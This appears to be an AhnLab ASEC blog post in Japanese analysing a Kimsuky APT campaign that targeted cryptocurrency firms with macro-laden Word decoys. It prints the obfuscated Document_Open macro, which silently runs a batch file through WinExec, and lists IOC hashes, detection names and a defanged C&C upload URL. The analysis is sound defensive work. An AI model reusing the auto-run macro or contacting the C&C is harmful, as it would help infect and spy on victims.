コイン関連内容の Word ドキュメントを利用した APT 攻撃 (Kimsuky)

ASEC 分析チームは3月21日、Kimsuky グループがコイン関連の内容を含む Word ドキュメントで APT 攻撃を行っていることを確認した。攻撃に使用したおとり文書は 3件が確認されており、マクロの製作者および動作方式は3月17日に ASEC ブログで掲載した内容(タイトル:製品紹介書に偽装した不正な Word ドキュメント)と同じである。3件すべてが正常に作成された Word ドキュメントをベースに悪意のあるマクロコードを追加して配布したものと推定され、内容はすべて仮想通貨と関連しており、コイン業者をターゲットにした攻撃と推定される。ドキュメントの保存者は Acer という名前であり、すべて3月21日午前に編集されており、直近の攻撃に利用される可能性が高く、特に注意が必要である。

  • 株主物量関連.doc(保存者:Acer、保存日:2022-03-21 10:29)
  • 資産負債状況.doc(保存者:Acer、保存日:2022-03-21 11:10)
  • 第3次定期総会.doc(保存者:Acer、保存日:2022-03-21 11:03)
[図1] 株主物量関連.doc
[図2] 資産負債状況.doc
[図3] 第3次定期総会.doc
[図4] ドキュメントの前回保存日時の比較

確保した3つのドキュメントはすべて同じマクロを使用しており、過去のブログで紹介した temp.doc マクロコードと機能が一致した。

  • 機能:「C:\Users\Public\Documents\no1.bat」ファイルの実行
Private Declare PtrSafe Function NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long

Sub Document_Open()
   NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp "C:\Users\Public\Documents\no1.bat", 0
End Sub

「no1.bat」ファイルを生成する主体は収集されたドキュメントファイルではなく、別のドキュメントにより生成されたものと推定される。これは、過去のブログで取り上げたように以下 [図5] のようなマクロ有効化ボタンのクリックを誘導するドキュメントのマクロにより生成されたものと思われる。

[図5] マクロ有効化ボタンのクリックを誘導する最初の不正なドキュメント

結果的に、製品紹介書に偽装した不正な Word ドキュメントの配布方式と、今回の事例の配布および動作方式は完全に一致した。従って、当該攻撃グループは現在、物流、ショッピングだけではなく仮想通貨事業者にも攻撃を行っているものと思われる。

ユーザーは出どころが不明な Word ファイルを開いたときに[図5]のようなメッセージが確認された場合、不正な Word ドキュメントである可能性があるため「コンテンツの有効化」ボタンをクリックする際は特に注意する必要がある。

現在 AhnLab V3 製品ではこのような攻撃について持続的にモニタリング中であり、以下の検知名で対応している。

[IOC]
[MD5]
– cloudy.bat : 0ecc9a4cea5c289732c76234c47a60e9
– download.vbs : 82ed73e4adbe5c26bafb5072657fd46b
– no4.bat : 7a2f350a2a6aa1d065c2b19be6dc6fb4
– start.vbs : 8a2eeafca1b33010d7ed812cf17d42f5
– upload.vbs : 869f98aac4963c7db7276d2a914d081e
– 자산부채현황.doc : a872dbb06e2dc721f180d05e2c1c8c20
– 제 3차 정기총회.doc : 56a936b9b3a3bdafed40cf5d056febaf
– 주주물량관련.doc : dc0223fb97891a90049d0c0d2beeb756

[検知名(エンジンバージョン)]
– cloudy.bat : Trojan/VBS.Akdoor (2022.03.23.00)
– download.vbs : Downloader/VBS.Generic (2022.03.23.00)
– no4.bat : Trojan/BAT.Agent (2022.03.23.00)
– start.vbs : Trojan/VBS.Akdoor (2022.03.23.00)
– upload.vbs : Trojan/VBS.Akdoor (2022.03.23.00)
– 資産負債状況.doc : Trojan/DOC.Agent (2022.03.23.00)
– 第3次定期総会.doc :Trojan/DOC.Agent (2022.03.23.00)
– 株主物量関連.doc :Trojan/DOC.Agent (2022.03.23.00)

[C&C]
– hxxp://sysrtri-man.com/upl11/upload.php

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories:マルウェアの情報

Tagged as:, ,

5 1 vote
評価する
guest
0 コメント
Inline Feedbacks
View all comments